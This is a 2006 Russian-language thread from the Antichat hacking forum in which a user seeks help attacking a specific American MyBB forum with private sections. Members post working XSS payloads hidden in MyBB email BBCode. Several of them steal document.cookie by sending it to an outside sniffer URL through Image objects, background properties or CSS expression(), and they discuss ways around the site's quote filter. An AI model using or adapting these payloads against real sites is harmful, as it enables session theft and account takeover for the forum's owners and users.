Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Уязвимость движка MyBB (https://forum.antichat.xyz/showthread.php?t=21257)

Romaxa55 03.07.2006 01:14

Уязвимость движка MyBB
 
Всем привет, парни нужна помощ, такая ситуация, есть один форум, который имеет приватные разделы, переюзал множество сплоитов, в версии форума еще не уверен, в админке пишет MyBB 1.1, может ктонить чтонить посоветует, может инъекции есть? Ну вовсем кидайте сюда все, буду очень признателен. Если есть такие кто может помоч мне в деле, то стукните в асю (858476) там и спишемся.

SanyaX 03.07.2006 01:23

Возможно админ умный и прикрыл все дыры. Вот и сплойты не работают, а может руки такие.

Hao Asakura 03.07.2006 01:28

Если это на рухелпе то там дырки закрыты.
По крайней мере на ipb 1.3 final сплойт не сработал.

Romaxa55 03.07.2006 02:02

Парни, ну не эжто мы так просто сдадимся??? Ведь не уязвимых движков не существует. Форум американских юзеров. Поэтому врядли что либо они делали, вндь юзер по безопасности поставил бы аундификацую на админку, а там так просто все стоит, да и юзеров зарегино не много, кинтьсе линк на рабочии сплоиты (а то обычно с ошибками пишутся) буду очень признателен. Боюсь оставить линк жертвы, если кто может посмотреть, то кину в пм.

Romaxa55 03.07.2006 02:23

О да, парни я это сделал, хсс прокатило, вот сам код есди кому интересно
[*code][*email=a"onmousemove="*alert(document.cookie);"mai l@mail.ru]Нажми сюда![*/email][*/code]
(Без *)

Hao Asakura 03.07.2006 02:41

Неуязвимых движков нет.

Ты линк дай на форум.

Romaxa55 03.07.2006 03:38

Цитата:

Сообщение от Hao Asakura
Неуязвимых движков нет.

Ты линк дай на форум.

Линк я тебе отправил в ПМ
----------------------------------------------------------------------
Люди теперь я сдаюсь, сплоит
Код:

[*code][*email=a"onmousemove="alert(document.cookie);"mail@mail.ru]Нажми сюда![*/email][*/code]
работает (естественно без звездочек) а вот под сниффер чтоб работал мозгов не хватает, нужна срочно помощь (плизззз)

bul.666 03.07.2006 04:03

Код:

[*code][*email=a"onmousemove="img=new/**/Image();img.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;"mail@mail.ru]Нажми сюда![*/email][*/code]
Поробуй так ))) Если у тебя код рабочий )))

Romaxa55 03.07.2006 05:20

Пробовал, там еще нужно <script> закодировать, но на ковычки фильтр стоит, вот думаю как их обнануть
Сплоит
Код:

[*code][*email=a"onmousemove="<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>;"mail@mail.ru]sex[*/email][*/code]
Исходник.
Код:

"><a href="mailto:a"onmousemove="&lt;script&gt;img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;&lt;/script&gt;;"mail@mail.ru">sex</a></div><br />
Как вижу фильтр стоит на ковычки <> вот терь такой вопрос, как можно обойти фильтр на ковычки?

Cheburek 03.07.2006 07:52

для активного хавтило бы только этого
Код:

[*code][*email=a"onmouseover=document.body.background="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;"mail@mail.ru]sex[*/email][*/code]
будет работать только в ie(хотя х/з) ... как впрочьем и вариант с img...
но здесь можно при желании по-моему и пасивное XSS сделать что-нибуть типо:
Код:

[*code][*email=a"style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null`mail@mail.ru]sex[*/email][*/code]


Время: 17:18